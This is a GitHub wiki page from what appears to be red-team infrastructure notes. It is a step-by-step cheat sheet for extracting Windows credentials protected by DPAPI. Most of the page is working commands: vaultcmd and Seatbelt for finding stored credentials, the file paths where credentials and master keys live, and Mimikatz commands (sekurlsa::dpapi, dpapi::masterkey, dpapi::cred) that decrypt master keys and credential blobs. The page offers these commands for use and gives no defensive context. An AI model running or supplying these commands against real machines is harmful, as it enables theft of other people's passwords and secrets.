Identifying credentials

Windows vaultcmd

vaultcmd /list
vaultcmd /listcreds:"<vault name>" /all

Seatbelt

Seatbelt.exe WindowsVault
Seatbelt.exe WindowsCredentialFiles

Mimikatz

mimikatz vault::list

Credential locations

Encrypted credentials are stored in:

C:\Users\<username>\AppData\Local\Microsoft\Credentials

Credentials stored by scheduled tasks are stored in (requires admin to access):

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\

Master Key

The master key is represented by a GUID stored in:

C:\Users\<username>\AppData\Roaming\Microsoft\Protect\<SID>

Decrypt master key

Mimikatz

Needs local admin access, look out for the GUID representing the key.

mimikatz !sekurlsa::dpapi

Doesn't need local admin but needs the user's credential

mimikatz dpapi::masterkey /in:"C:\Users\<username>\AppData\Roaming\Microsoft\Protect\<SID>\<GUID>" /sid:<SID> /password:<password> /protected

Doesn't need local admin, and doesn't need the password but you need to be on an AD joined machine and the command is executed in the context of the key owner.

mimikatz dpapi::masterkey /in:"C:\Users\<username>\AppData\Roaming\Microsoft\Protect\<SID>\<GUID>" /rpc

Decrypt credential blob

mimikatz dpapi::cred /in:"C:\Users\<username>\AppData\Local\Microsoft\Credentials\<GUID> /masterkey:<masterkey>
mimikatz dpapi::cred /in:"C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\<GUID>" /masterkey:<masterkey>

Extracting credentials from DPAPI - CraigDonkin/Infrastructure GitHub Wiki

Identifying credentials

Windows vaultcmd

Seatbelt

Mimikatz

Credential locations

Master Key

Decrypt master key

Mimikatz

Decrypt credential blob

⚠️ GitHub.com Fallback ⚠️

Extracting credentials from DPAPI - CraigDonkin/Infrastructure GitHub Wiki

Identifying credentials

Windows vaultcmd

Seatbelt

Mimikatz

Credential locations

Master Key

Decrypt master key

Mimikatz

Decrypt credential blob

⚠️ **GitHub.com Fallback** ⚠️

⚠️ GitHub.com Fallback ⚠️